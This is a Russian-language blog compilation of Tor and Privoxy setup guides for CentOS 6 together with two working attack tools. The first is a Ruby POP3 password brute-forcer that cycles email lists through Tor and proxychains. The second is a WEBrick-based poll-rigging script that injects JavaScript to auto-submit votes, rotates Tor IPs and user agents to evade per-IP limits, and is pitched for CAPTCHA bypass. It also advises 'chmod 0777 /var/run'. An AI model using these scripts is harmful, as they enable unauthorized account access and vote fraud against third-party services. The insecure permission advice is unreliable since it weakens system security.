1
2
3

browser = Mechanize.new
browser.agent.set_proxy(host,port)
page=browser.get 'http://lukmus.ru'

Жизнь была бы проще если бы мы могли заменить метод set_proxy класса Mechanize::HTTP::Agent на аналогичный set_socks, но такого метода в этом классе нет. Однако его можно дописать самому, например вот так:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

require "socksify"
require 'socksify/http'
 
class Faraday::Adapter::NetHttp
  def net_http_class(env)
    if proxy = env[:request][:proxy]
      if proxy[:uri].scheme == 'socks'
        Net::HTTP::SOCKSProxy(proxy[:uri].host, proxy[:uri].port)
      else
        Net::HTTP::Proxy(proxy[:uri].host, proxy[:uri].port, proxy[:user], proxy[:password])
      end
    else
      Net::HTTP
    end
  end
end
 
class Mechanize::HTTP::Agent
 
  public
 
  def set_socks addr, port
    set_http unless @http
    class << @http
      attr_accessor :socks_addr, :socks_port
 
      def http_class
        Net::HTTP.SOCKSProxy(socks_addr, socks_port)
      end
    end
    @http.socks_addr = addr
    @http.socks_port = port
  end
 
end

Как подключать файлы, с содержанием подобному выше, к Rails-приложению каждый знает и без меня.

установка Tor на CentOS 6

Официальный сайт Tor’а дезинформирует, на нем указаны неверные ссылки в настройке репозитариев в инструкции по установке на RH-линуксы. Правильный конфиг репы ниже, его надо поместить в предварительно созданный /etc/yum.repos.d/Tor.repo.

[tor]
name=Tor experimental repo
enabled=1
#baseurl=http://deb.torproject.org/torproject.org/rpm/DISTRIBUTION/$basearch/
baseurl=http://deb.torproject.org/torproject.org/rpm/el/6/$basearch/
gpgcheck=1
gpgkey=http://deb.torproject.org/torproject.org/rpm/RPM-GPG-KEY-torproject.org.asc
 
[tor-source]
name=Tor experimental source repo
enabled=1
autorefresh=0
#baseurl=http://deb.torproject.org/torproject.org/rpm/DISTRIBUTION/SRPMS
baseurl=http://deb.torproject.org/torproject.org/rpm/el/6/SRPMS/
gpgcheck=1
gpgkey=http://deb.torproject.org/torproject.org/rpm/RPM-GPG-KEY-torproject.org.asc

Далее установка и запуск никак не отличается от федореной:

# yum install tor -y

# service tor start

установка privoxy на CentOS 6

Инструкция на офсайте ничего дельного кроме сборки из тарболов предложить не может, зато могу я.
Прежде всего нужно установить одну штуку, которя сама собственно, особо не нужна, но нужна ее библиотека одна.

$ yum provides libpcreposix.so.0
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
 * base: mirror.nl.leaseweb.net
 * extras: centos.mirror.triple-it.nl
 * updates: mirrors.supportex.net
pcre-7.8-6.el6.i686 : Perl-compatible regular expression library
Repo        : base
Matched from:
Other       : libpcreposix.so.0
 
pcre-7.8-6.el6.i686 : Perl-compatible regular expression library
Repo        : installed
Matched from:
Other       : Provides-match: libpcreposix.so.0

# yum install pcre-7.8-6.el6.i686 -y

Теперь качаем, устанавливаем и запускаем:

$ wget ftp://ftp.pbone.net/mirror/rpm.razorsedge.org/centos-4/RE-test/privoxy-3.0.12-1.el4.re.i386.rpm

# rpm -Uvh privoxy-3.0.12-1.el4.re.i386.rpm

# service privoxy start

Если у вас CentOS x64 париться из-за i386 в названии rpm-файла не надо, у меня все нормально встало.

Чтобы не конфигурировать все прикладное ПО заново я просто копировал конфиги со старой машины. И сегодня вдруг обнаружил, что мой privoxy не пашет как надо т.е. старый конфиг под privoxy 3.0.10 и меньше ей не подошел, и новую актуальную конфигурацию и весь процесс установки я опишу здесь. Напомню, что все что здесь будет описано 100% подходит только для Red Hat Linux’ов, возможно это подойдет и для других, однако такие варианты не тестировались.

Здесь ничего не изменилось, ставим под root’ом через yum:

yum install privoxy

Теперь нужно дать права privoxy на создание файла /var/run/privoxy.pid, а то он будет орать

# service privoxy start
No /var/run/privoxy.pid file found, exiting.
Starting Privoxy, Failed.

Лично я не страдал фигней с вычислением под каким пользователем работает privoxy и добавлению его в группу, после чего было бы возможно грамотно выставить права на директорию, поэтому я просто разрешил писать в /var/run всем.

# chmod 0777 /var/run

Предыдущую конфигурацию я приводил в статье про брутфорс. Так вот открываем наш конфиг /etc/privoxy/config и начинаем его править.

/etc/privoxy/config

Во-первых нужно добавить к именам всех так называемых экшенфайлов (actionsfile) расширение т.е. заменим

actionsfile standard # Internal purpose, recommended
actionsfile default # Main actions file
actionsfile user # User customizations

на следующий конфиг

actionsfile standard.action # Internal purpose, recommended
actionsfile default.action   # Main actions file
actionsfile user.action       # User customizations

в противном случае в логах будет записано что-то вроде

Aug 03 03:27:46.455 7f049cde2700 Info: Privoxy version 3.0.16
Aug 03 03:27:46.455 7f049cde2700 Info: Program name: privoxy
Aug 03 03:27:46.456 7f049cde2700 Fatal error: can't load actions file '/etc/privoxy/standard': No such file or directory. Note that beginning with Privoxy 3.0.7, actions files have to be specified with their complete file names.

Таким образом наш конфигурационный файл /etc/privoxy/config будет выглядеть так:

# Generally, this file goes in /etc/privoxy/config
#
# Tor listens as a SOCKS4a proxy here:
forward-socks4a / 127.0.0.1:9050 .
confdir /etc/privoxy
logdir /var/log/privoxy
actionsfile standard.action # Internal purpose, recommended
actionsfile default.action   # Main actions file
actionsfile user.action       # User customizations
filterfile default.filter
#
# Если хотите чтобы логи велись, то разкомментируйте две следующие строки
#logfile logfile
#jarfile jarfile
#debug   0    # show each GET/POST/CONNECT request
debug   4096 # Startup banner and warnings
debug   8192 # Errors - *we highly recommended enabling this*
#
user-manual /usr/share/doc/privoxy/user-manual
listen-address  127.0.0.1:8118
toggle  1
enable-remote-toggle 0
enable-edit-actions 0
enable-remote-http-toggle 0
buffer-limit 4096

/etc/privoxy/standart.action

Вторая проблема – по непонятным причинам в пакете с privoxy yum не нашел или не установил экшенфайл standart.action поэтому нам надо его взять из прошлого конфига или увидеть ниже.

################
#
# Cautious settings -- safe for all sites, but offer little privacy protection
#
{ \
+change-x-forwarded-for \
+hide-from-header{block} \
+set-image-blocker{pattern} \
}
standard.Cautious
#
################
#
# Medium settings -- safe for most sites, with reasonable protection/damage tradeoff
#
{ \
+deanimate-gifs{last} \
+filter{refresh-tags} \
+filter{img-reorder} \
+filter{banners-by-size} \
+filter{webbugs} \
+filter{jumping-windows} \
+filter{ie-exploits} \
+change-x-forwarded-for \
+hide-from-header{block} \
+hide-referrer{conditional-block} \
+session-cookies-only \
+set-image-blocker{pattern} \
}
standard.Medium
#
################
#
# Advanced settings -- reasonable privacy protection but
# require some exceptions for trusted sites, most likely
# because of cookies or SSL. Also testing ground for
# new options.
#
# CAUTION: These settings can still be subverted by a
# misconfigured client that executes code from untrusted
# sources.
#
{ \
+client-header-tagger{css-requests} \
+client-header-tagger{image-requests} \
+crunch-if-none-match \
+crunch-outgoing-cookies \
+crunch-incoming-cookies \
+deanimate-gifs{last} \
+fast-redirects{check-decoded-url} \
+filter{html-annoyances} \
+filter{content-cookies} \
+filter{refresh-tags} \
+filter{img-reorder} \
+filter{banners-by-size} \
+filter{banners-by-link} \
+filter{webbugs} \
+filter{jumping-windows} \
+filter{frameset-borders} \
+filter{quicktime-kioskmode} \
+hide-if-modified-since{-60} \
+change-x-forwarded-for \
+hide-from-header{block} \
+hide-referrer{conditional-block} \
+limit-connect{,} \
+overwrite-last-modified{randomize} \
+set-image-blocker{pattern} \
}
standard.Advanced

Если вы будете брать старый standart.action, то там нужно заменить все

hide-forwarded-for-headers

на

change-x-forwarded-for

в противном случае в логе /var/log/privoxy/logfile будет

Aug 03 03:35:23.228 7f5a05657700 Info: Privoxy version 3.0.16
Aug 03 03:35:23.228 7f5a05657700 Info: Program name: privoxy
Aug 03 03:35:23.228 7f5a05657700 Fatal error: The action 'hide-forwarded-for-headers' is no longer valid in this Privoxy release. Use 'change-x-forwarded-for' instead.

Тут все по старому: под рутом запускаем tor и privoxy:

# service privoxy start
Starting Privoxy, OK.
# service tor start
Starting /usr/bin/tor:                                     [  OK  ]

Для пользователей других веток Linux следует помнить, что у вас команда запуска демонов выглядит иначе, например в Slackware запуск privoxy будет так:

# service start privoxy

Подробнее про конфигурацию privoxy можно прочитать на их оффсайте на русском языке privoxy.org.ru или же на полностью оффсайте privoxy.org. А о конфингурации tor все шикарно написано на torproject.org, там, кстати, есть документация и на русском.

1. собственно сам Tor;
2. Privoxy — это свободный веб-прокси с расширенными возможностями фильтрования интернет-контента для защиты конфиденциальности (приватности) пользователей сети Интернет, изменения содержания веб-страниц, управления cookies, ограничения доступа к некоторым сайтам и удаления рекламы, баннеров, всплывающих окон, а также любого другого нежелательного контента («интернет-мусора»);
3. Proxychains – программа, направляющая пакет уровня выше протокола IP, через цепочки заданных proxy(http) или socks(https,smtp,pop3,imap,ftp и др. в стеке протоколов выше IP)

Подробнее о их настройке можете прочитать на их официальных сайтах, в качестве примера, привожу мои настройки:

Tor (/etc/tor/torrc):

1
2
3
4

DataDirectory /var/lib/tor/.tor
NewCircuitPeriod 1
Group toranon
User  toranon

Privoxy (/etc/privoxy/config):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

forward-socks4a / 127.0.0.1:9050 .
confdir /etc/privoxy
logdir /var/log/privoxy
actionsfile standard  # Internal purpose, recommended
actionsfile default   # Main actions file
actionsfile user      # User customizations
filterfile default.filter
debug   4096 # Startup banner and warnings
debug   8192 # Errors - *we highly recommended enabling this*
user-manual /usr/share/doc/privoxy/user-manual
listen-address  127.0.0.1:8118
toggle  1
enable-remote-toggle 0
enable-edit-actions 0
enable-remote-http-toggle 0
buffer-limit 4096

Proxychains (/etc/proxychains.conf):

1
2
3
4
5
6
7
8
9
10

#dynamic_chain
random_chain  #случайный сервер
chain_len = 1 #максимальная длина цепи
tcp_read_time_out 20000
tcp_connect_time_out 20000
#список серверов
socks4 127.0.0.1 9050
socks4 127.0.0.1 9050
socks4 127.0.0.1 9050
socks4 127.0.0.1 9050

Примечание: как бы я не пытался но у меня так и не получилось заставить proxychains выстроить цепь из одного сервера, минимум цепочка состояла из двух, для этого я здесь и указал локальный хост несколько раз. Возникает вопрос: а почему бы тогда не указать его 2 раза; отвечу: для того чтобы сделать брутфорс более стабильным т.к. при обнаружении мертвого сервера (такое возможно с локальным хостом если ОС не даст сокет) proxychains возьмет следующий, так вот чтобы он мог брать 4 раза следуюший а не 2, здесь и написано 4 раза.

Далее я приведу код примитивного брутфорса, который будет состоять из 2-х скриптов:

1. скрипт инициирующий соединение, будет запускаться под tor’ом
2. скрипт инициирующий запуск первого скрипта.

1. На входе просит email-адрес, пароль и файл для удачных комбинаций (try_connect.rb)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

#!/usr/bin/ruby
require 'net/pop'
 
n=ARGV.size
if n!=3
 puts "Not enought arguments\n"
 exit
end
 
login=ARGV[0].split('@')[0]
pop_server='pop.'+ARGV[0].split('@')[1]
paswd, outfile=ARGV[1],ARGV[2]
 
puts "/#{pop_server}/#{login}/#{paswd}/"
invalid=false
begin
  begin
    Net::POP3.auth_only(pop_server, 110,login, paswd)
  rescue Net::POPAuthenticationError
    invalid=true
    puts "FAIL /#{ARGV[0]}/#{ARGV[1]}/  #{Time.now}"
  end
rescue => e
  invalid=true
  puts "#{Time.now} can't connect #{e}"
  #retry
end
 
if invalid==false
  puts "SUCCESS /#{ARGV[0]}/#{ARGV[1]}/  #{Time.now}"
  File.open(outfile,"a") do |sfile|
    sfile.puts "#{Time.now}  #{ARGV[0]}:#{ARGV[1]}"
  end
end

2. На входе просит фаил-список e-mail адресов и файл для удачных комбинаций (get_next.rb)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

#!/usr/bin/ruby

n=ARGV.size
if n<1 or n>2
  puts "Not enought arguments\n  []"
  exit
end
 
infile=ARGV[0]
if n==1 then outfile=infile+'_out' else outfile=ARGV[1] end
 
begin
  file=File.new(infile)
rescue =&gt; e
  puts "Inputfile error:#{e}"
end
 
pass=['yourfirstpass','yoursecondpass','yourthirdpass','  etc']
 
str=''
no=0
while str!=nil
  puts "#{no})"
  str=file.gets
  if str!=nil
    mail=str.to_s.chop!
    pass.each do |paswd|
      puts "proxychains ./try_connect.rb #{mail} #{paswd}"+
      "#{outfile}"
      system("proxychains ./try_connect.rb #{mail} #{paswd}"+
      "#{outfile}")
      sleep(3) #интервал между запросами
    end#each
  end#if
  no+=1
end#while
file.close

Теперь рассмотрим прицип работы:

1. скрипт get_next.rb берет из списка email и дает команду интерпритатору bash: ‘proxychains ./try_connect.rb #{mail} #{paswd} #{outfile}’
2. bash запускает proxychains
3. proxychains запускает try_connect.rb под своим прикрытием т.е. пакет идет на локальный прокси/сокс privoxy, который в свою очередь доверяет маршрутизацию пакета сети Tor, который предусмотрительно меняет свои сервера (в этом можно убедиться запустив браузер под tor’ом, где обновлять страницу скажем 2ip.ru)
4. по выше приведенному пути try_connect.rb ведет диалог с pop3-сервером поповоду авторизации

Использовать связку tor-privoxy-proxychains можно для любого брутфорса, работающего на протоколах выше IP, по-мойму кроме ICMP, тем самым можно не писать нудные процедуры посылки пакета через прокси, а написав примитивный брутфорс запускать его под этой связкой.

Примечание: все выше указанное ПО, в том числе скрипты, тестировались только под ОС Linux, однако на офсайтах privoxy,tor и proxychains заявленно что существуют версии и для Windows и для Mac. Приведенные здесь скрипты написанны на Ruby, который в свою очередь тоже являеться кроссплатформенным.
Увеличить скорость работы приведенных скриптов можно добавив многопоточность.

Статья является плодом бурной фантазии автора и не призывает
ни к каким действиям, противоречащим законодательству.
Ответственность за использование материала ложиться только
на вас! Любые совпадения с реальными людьми считаются
случайными.

1. сервер посылает гипер-текстовую страницу с вкраплениями JS и исходных данных
2. JS обрабатывает переданные в явном виде данные и формирует из них данные для верификации запроса
3. браузер дает запрос серверу с целевыми аргументами и аргументами для верификации запроса
4. сервер анализирует полученные данные верификации запроса и если они удовлетворяют требованиям, то обрабатывает целевые

Мой способ обойти подобные сложности не претендует на изящность или сверхскорость, однако он рабочий и более-менее универсальный, а самое главное не придеться разбирать JS. Далее я опишу этот способ на примере накрутчика голосования.

Итак, у нас имеется сайт с голосованием, где:

1. в течении 24-х часов с одного ip-адреса можно проголосовать только 1 раз
2. данные запроса к серверу содержат кукисы, целевое значение(номер позиции, за которую я проголосовал), данные верификации запроса (формируются посредством 750-строчного JS-кода закодированного всеми возможными base64, а так же какими-то своими способами кодирования и все это разбавлено максимально непонятным стилем программирования).

Ограничение с ip-адресом мы обходим за счет проксиков/tor/итд, собрать сам AJAX/POST-пакет с кукисами и целевыми параметрами мы тоже легко можем, однако как быть с параметрами формируемыми JS.
Первая мысль, конечно, была – разобрать сам JS код, но как показала практика это того не стоит.
Второй вариант – найти/написать самому интерпритатор JS с поддержкой DOM, но писать самому это очень долго, а существующие решения весьма карявые и сильно не дотягивают до интерпритаторов современных браузеров.
Третьей мыслью и был как раз мой способ.

1. Web-сервер

Нам нужно либо написать свой HTTP-сервер, либо воспользоваться уже существующим. Код для формирования страниц там будет очень легкий, поэтому жизнеспособны оба варианта. Я воспользовался чем-то средним между двумя этими вариантами – библиотека-сервер Webrick. Скрипт написан на Ruby.

#!/usr/bin/ruby
require 'webrick'
include WEBrick
require 'net/http'

# глобальный массив браузеров,
# дабы не вызвать подозрений
$user_agents=["Mozilla/5.0 (Windows; U; Windows NT 6.1;"+
  " en-US; rv:1.9.1.5) Gecko/20091102 Firefox/$$v$$",
  "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.17)"+
  " Gecko/2010010604 Ubuntu/9.04 (jaunty) Firefox/$$v$$",
  "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7)"+
  " Gecko/20091221 MRA 5.5 (build 02842) Firefox/$$v$$",
  "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.7)"+
  " Gecko/20191231 MRA 5.4 (build 02842) Firefox/$$v$$",
  "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;"+
  " WebMoney Advisor)",
  "Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru)"+
  " Presto/2.2.15 Version/$$v$$",
  "Opera/9.80 (Windows NT 6.1; U; ru) Presto/2.2.15 Version/$$v$$",
  "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident"+
  "/$$v$$; GTB6.4; InfoPath.2; .NET CLR 1.1.4322)",
  "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/"+
  "532.5 (KHTML, like Gecko) Chrome/$$v$$.249.78 Safari/532.5",
  "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Tr"+
  "ident/4.0; GTB6.4; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30"+
  "729; .NET CLR 3.0.30729)",
  "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.9.0.17) Gecko/2008"+
  "0528 Epiphany/$$v$$ Firefox/3.0",
  "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/"+
  "532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5",
  "Opera/9.64 (Windows NT 6.0; U; ru) Presto/2.1.1",
  "Lynxy/6.6.6dev.8 libwww-FM/3.14159FM",
  "PycURL/7.18.2",
  "Opera/9.51 (Windows NT 6.0; U; en)"]

# хэш замен
$replace={"/konkurs"=>"http://kakoi-nit.oprosnik.ru/konkurs"}

# совершенно не обязательная перегрузка функции
# get из Net::HTTP, увеличивает шансы что
# страница будет загружена, хотя и без нее шансы не малы
class  Net::HTTP
  def my_get(path,headers)
    begin
      return self.get(path,headers)
    rescue TimeoutError
      sleep(1)
      retry
    rescue Errno::ENETUNREACH
      sleep(10)
      retry
    else
      sleep(1)
      retry
    end#begin
  end#def
end#class

# формирует User-agent запроса посредством
# глобального массива $user_agents
def get_user_agent
  return $user_agents[rand($user_agents.size-1)].
    gsub('$$v$$',"#{(rand(10)+1)}.#{(rand(10)+1)}")
end

# формирует заголовок запроса
def get_headers
  headers = {   'User-agent'=> get_user_agent,
    'Accept'=> 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language'=> 'ru,en-us;q=0.7,en;q=0.3',
    'Accept-Charset'=> 'UTF-8,*',
    'Keep-Alive'=> '300',
    'Connection'=> 'keep-alive'}
  return headers
end

# чисто webrick'овская примочка,
# создает еще один поток который
# ожидает на ввод 'q\n' чтобы завершить
# работу сервера
th=Thread.new do
  while true do if STDIN.gets.chop=="q" then exit! end end
end

# конфигурируем и запускаем сам сервер webrick
config={}
config.update(:Port => 8080)
server = HTTPServer.new(config)
ruby_dir = File.expand_path('www')
server.mount("www", HTTPServlet::ERBHandler, ruby_dir)

# делаем сервелет для webrick
server.mount_proc('/js-miracle') do |req,resp|

  # получаем страницу голосования с интересуещего нас сайта
  http=Net::HTTP.new('kakoi-nit.oprosnik.ru', 80)
  respp, data = http.my_get("/konkurs/super-golosovanie",get_headers)

  # передаем куки
  resp['Set-Cookie']=respp['set-cookie']

  #ВНИМАНИЕ ЗДЕСЬ ВСЯ ФИШКА
  # заменяем часть строки исходной страницы на нужный нам код
  data.gsub!("href=\"javascript: create_verified(0);\"",
    "href=\"javascript: create_verified(0);\" id=\"jslink\"")
  data.gsub!("konkurs/images/vote.png\" alt=\"\" /></a>",
    "konkurs/images/vote.png\" alt=\"\" /></a><script "+
    "type=\"text/javascript\"> document.getElementById("+
    "'jslink').onclick();</script>")
  #ФИШКА ЗАКОНЧИЛАСЬ

  # меняем адреса ссылок с относительных на kakoi-nit.oprosnik.ru
  # на абсолютные на kakoi-nit.oprosnik.ru посредством хэша замен $replace
  $replace.each {|k,v| data.gsub!(k,v)}

  # передаем страницу
  resp.body=data
end#server

# запускаем сервер
server.start

Теперь разберемся. Во-первых не надо пугаться webrick и Ruby это чисто мой выбор, можно использовать абсолютно любую связку PHP+Apache, PHP+Denver итд вплоть до написания своего маленького однопоточного сервера на C или Delphi. Сервелет это что-то типа странички на PHP или ERB, я выбрал его дабы не заморачиваться и писать меньше кода, однако PHP или его аналог ни в чем ему не уступит.

Как это работает и зачем оно нужно:

1. вы запускаете сервер и открываете браузер на странице http://127.0.0.1:8080/js-miracle
2. сервер получив ваш запрос, отправляет запрос на сервер kakoi-nit.oprosnik.ru c целью получить страничку голосования /konkurs/super-golosovanie, иначе говоря заходит по адресу http://kakoi-nit.oprosnik.ru/konkurs/super-golosovanie.
3. берет полученные от kakoi-nit.oprosnik.ru куки и вкладывает их в ответ вашему браузеру
4. в секторе про ФИШКУ мы заменяем или добавляем наш JS код т.е. допустим при нажатии на кнопку ‘голосовать’ управление передаеться в JS функцию formirovanie_verified_parameters(), в которой к параметрам формы добавляеться всякая фигня для верификации (заполнение скрытых полей, добавление новых кукисов итд) без которой kakoi-nit.oprosnik.ru воспримит наш следующий запрос как фальшивый. Конечно, мы можем каждый раз вручную нажимать на кнопку ‘голосовать’ но мы же автоматизируем, поэтому мы вставляем сюда код, который при загрузке страницы имитирует нажатие на эту кнопку, причем дальше браузер сам выполнит все как нужно, как будто мы это сделали вручную.
   В данном случае у нас есть картинка konkurs/images/vote.png, которая вложена в тэг ссылки

   1 2	<a href=”javascript:create_verified()”><img src=”konkurs/images/vote.png” alt=”” /></a>

   и при загрузке нам нужно на нажать на картинку, чтобы активизировать ссылку, но чтобы это сделать нам сначало нужно как-то идентифицировать ссылку поэтому мы добавляем ей параметр id="jslink". А затем, добавлем сам код нажатия .

5. меняет ссылки со всех картинок, css-таблиц, js-файлов итд с относительных kakoi-nit.oprosnik.ru на абсолютные http://kakoi-nit.oprosnik.ru/example_page.html. Короче говоря, когда он получит страницу с kakoi-nit.oprosnik.ru большинство ссылок там будут иметь вид /link/path/to/object.js, и если наш браузер получит страницу с таким путем ссылок, то он будет просить этот ресурс у нашего сервера (webrick), а у нас их нет, зато они есть у kakoi-nit.oprosnik.ru, поэтому мы меняем их на http://kakoi-nit.oprosnik.ru/link/path/to/object.js.
6. заполянем html-тело ответа нашему браузеру в точности такое же как страница http://kakoi-nit.oprosnik.ru/konkurs/super-golosovanie за исключением смены адресов ссылок и изменение/добавление JS-кода.

В итоге в браузере мы получаем точно такую же страницу как http://kakoi-nit.oprosnik.ru/konkurs/super-golosovanie, с теми же самыми куками и параметрами верификации + наш личный JS-код нажатия на кнопку/ссылку, короче код автоматизации процесса.

2. Обход бана по ip

Нам нужно выбрать какой-нить браузер, где можно установить так:

1. не использовать прокси/socks/tor/итд для 127.0.0.1
2. использовать прокси/socks/tor для всех остальных

Этим требованиям отлично удовлетворяет FireFox.

Лично я не стал заморачиваться с проксями а решил использовать tor:

• поднимаем локальный проксик privoxy
• устанавливаем tor
• в настройках прокси FF ставим адрес и порты privoxy, чаще всего это бывает так 127.0.0.1:8118.

Далее ставим домашнюю страницу на наш локальный web-сервер (webrick) т.е. http://127.0.0.1:8080/js-miracle

Теперь при запуске вашего браузера он сам будет выполнять все нужные действия т.е. вам нужно только нажать на ярлык браузера и будет отсылаться нужный вам запрос.

3. Автоматизация запуска браузера

Поскольку нам нужно отправлять миллионы таких запросов разумно было бы зациклить запуск и закрытие браузера.
Это можно сделать как угодно, для linux это может быть bash-скрипт, для windows – bat-файл или на худой конец скрипт любого ЯП.
Я выбрал ‘худой конец’ (скрипт написан на Ruby, Linux):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#!/usr/bin/ruby
lim=200
sleep_time=50
def my_sleep (sl)
  for i in 0..sl
   sleep(1)
   print '.'
   STDOUT.flush
  end
end
 
for i in 0..lim do
  puts 'browser start'
  system('firefox http://127.0.0.1:8080/js-miracle &')
  my_sleep sleep_time
  puts "\n kill start"
  system('killall firefox')
end

Замечания и примечания

После запуска сервера и последнего скрипта каждые 50 секунд будет открываться FF автоматически выполняя вашу задачу, процесс будет повторяться 200 раз т.е. будет отправлено 200 запросов или 200 голосов в голосовании будет за меня. Поскольку постоянное мелькание браузера может раздражать пользователям *nix рекомендую заменить firefox на консольный links, и мелькание прекратиться. Пользователям windows не знаю что посоветовать, кроме как сделать окно FF мимнимального размера.

Что касаеться tor и privoxy, они далеко не обязательны, с ними удобнее, однако по скорости они заметно уступят приватным проксям. Для того чтобы сделать все через прокси, нужно будет использовать такие упаковщики трафика как proxychains и widecap итд. Однако так как они не будут разбираться к какому хосту обращаеться браузер и упаковывают весь трафик, их нужно будет либо настроить на то чтобы не применялись прокси для localhost, либо разместить наш сервер на каком-нить бесплатном хостинге или еще где угодно, главное чтобы не в нашей подсети.

Теперь относительно периода открывания браузера. Я взял 50 секунд, иногда этого много, а иногда мало, в зависимости от выбранных нодов тора. Оптимизаторам следует, конечно, выбирать не постоянный период а вычислять прогрузился ли сайт в браузере или нет, и соответсвенно после того как браузер все сделал закрывать его.

Вся эта штука тестировалась, запускалась и работала только под линуксом, однако все должно работать и под виндой, за исключением скрипта автоматизации запуска браузера, но для винды легко пишеться bat-файл.

Выводы и итоги

Этот принцип не отличаеться изящностью и быстродействием, однако он очень универсален, его можно применять далеко не только для опросов. Он хорошо работает для обхода капчи, где верификация капчи проходит через AJAX, парсинга тех сайтов, где админы очень любят все запутать, например списка проксиков, короче он применим везде где вам не нравиться тот или иной JavaScript на странице сайта.
И еще раз обнадежу, весь код приведенный здесь не играет никакого приципиального значения, он целиком и полностью заменяеться аналогичным на PHP, С, Delphi итд.

Статья является плодом бурной фантазии автора и не призывает
ни к каким действиям, противоречащим законодательству. 
Ответственность за использование материала ложиться только 
на вас! Любые совпадения с реальными людьми считаются 
случайными.